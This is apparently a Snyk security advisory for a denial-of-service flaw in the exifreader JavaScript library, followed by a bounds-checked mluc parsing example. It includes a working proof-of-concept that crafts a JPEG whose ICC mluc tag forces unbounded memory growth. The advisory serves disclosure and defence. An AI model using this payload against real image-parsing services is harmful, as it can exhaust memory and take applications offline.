Improper Validation of Specified Quantity in Input Affecting exifreader package, versions <4.39.0


Severity

high

CVSS assessment by Snyk's Security Team.

Threat Intelligence

Exploit Maturity: Proof of Concept
EPSS: 0.05% (17th percentile)

  • Snyk ID: SNYK-JS-EXIFREADER-16689335
  • published: 18 May 2026
  • disclosed: 6 May 2026
  • credit: Yuki Matsuhashi

Introduced: 6 May 2026

CVE-2026-8813
CWE-1284
First added by Snyk

How to fix?

Upgrade exifreader to version 4.39.0 or higher.

Overview

exifreader is a library that parses Exif metadata in images.

Affected versions of this package are vulnerable to Improper Validation of Specified Quantity in Input. A crafted image containing an ICC mluc tag can set an attacker-controlled record count together with a zero record size. During parsing, ExifReader repeatedly processes the same record and appends entries to an array without sufficient bounds validation, causing excessive memory growth. In applications that parse attacker-supplied images, this may lead to denial of service through memory exhaustion.

PoC

import ExifReader from 'exifreader'

const icc = Buffer.alloc(200)

// ICC profile header
icc.writeUInt32BE(icc.length, 0)      // profile size
icc.write('acsp', 36, 'ascii')        // ICC signature

// ICC tag table
icc.writeUInt32BE(1, 128)             // tag count = 1
icc.write('abcd', 132, 'ascii')       // tag signature
icc.writeUInt32BE(144, 136)           // tag offset
icc.writeUInt32BE(40, 140)            // tag size

// ICC "mluc" tag: multiLocalizedUnicodeType
icc.write('mluc', 144, 'ascii')       // tag type
icc.writeUInt32BE(0, 148)             // reserved
icc.writeUInt32BE(0x7fffffff, 152)    // numRecords: huge loop count
icc.writeUInt32BE(0, 156)             // recordSize = 0, so offset never advances

// First mluc record; repeatedly reread because recordSize is 0
icc.write('enUS', 160, 'ascii')       // language + country
icc.writeUInt32BE(0, 164)             // textLength
icc.writeUInt32BE(0, 168)             // textOffset

const payload = Buffer.concat([
  Buffer.from('ICC_PROFILE\0', 'binary'), // JPEG APP2 ICC identifier
  Buffer.from([1, 1]),                    // chunk number = 1, total chunks = 1
  icc
])

const app2Length = payload.length + 2

const jpeg = Buffer.concat([
  Buffer.from([0xff, 0xd8]),                         // JPEG SOI
  Buffer.from([0xff, 0xe2, app2Length >> 8, app2Length & 0xff]), // APP2 marker + length
  payload,
  Buffer.from([0xff, 0xda, 0x00, 0x0c])              // SOS marker
])

ExifReader.load(jpeg)
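
A bounds-checked reading of the mluc structure described in the Overview, as an added example that is not ExifReader's code or its 4.39.0 fix. `parseMluc` and `buildMluc` are hypothetical names, the record layout follows the ICC multiLocalizedUnicodeType definition, and the sample tag is constructed.

```javascript
// Added example (not ExifReader code). mluc layout: type(4) reserved(4)
// numRecords(4) recordSize(4), then records of lang(2) country(2) length(4) offset(4).
const MLUC_HEADER = 16
const MLUC_RECORD = 12
function parseMluc(tag) {
  if (tag.length < MLUC_HEADER || tag.toString('latin1', 0, 4) !== 'mluc') {
    throw new RangeError('not an mluc tag')
  }
  const numRecords = tag.readUInt32BE(8)
  const recordSize = tag.readUInt32BE(12)
  // recordSize 0 rereads the same bytes each iteration; below 12 holds no record.
  if (recordSize < MLUC_RECORD) {
    throw new RangeError(`mluc recordSize ${recordSize} is below ${MLUC_RECORD}`)
  }
  // The count must fit in the bytes present, bounding the loop by input size.
  const maxRecords = Math.floor((tag.length - MLUC_HEADER) / recordSize)
  if (numRecords > maxRecords) {
    throw new RangeError(`mluc numRecords ${numRecords} exceeds ${maxRecords}`)
  }
  const records = []
  for (let i = 0; i < numRecords; i++) {
    const at = MLUC_HEADER + i * recordSize
    const length = tag.readUInt32BE(at + 4)
    const offset = tag.readUInt32BE(at + 8)
    if (length % 2 !== 0 || offset + length > tag.length) {
      throw new RangeError(`mluc record ${i} text is out of bounds`)
    }
    // Text is UTF-16BE; copy before swapping so the input buffer is untouched.
    const text = Buffer.from(tag.subarray(offset, offset + length)).swap16()
    records.push({
      language: tag.toString('latin1', at, at + 2),
      country: tag.toString('latin1', at + 2, at + 4),
      text: text.toString('utf16le'),
    })
  }
  return records
}
// Constructed sample tag with one 'enUS' record; count and size are arguments.
function buildMluc(numRecords, recordSize, text) {
  const body = Buffer.from(text, 'utf16le').swap16()
  const tag = Buffer.alloc(28 + body.length)
  tag.write('mluc', 0, 'latin1')
  tag.writeUInt32BE(numRecords, 8)
  tag.writeUInt32BE(recordSize, 12)
  tag.write('enUS', 16, 'latin1')
  tag.writeUInt32BE(body.length, 20) // textLength
  tag.writeUInt32BE(28, 24)          // textOffset, right after the record
  body.copy(tag, 28)
  return tag
}
```

Both header fields from the PoC (`numRecords` of 0x7fffffff and `recordSize` of 0) are rejected before any record is read, so the work done is bounded by the size of the tag rather than by a value inside it.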
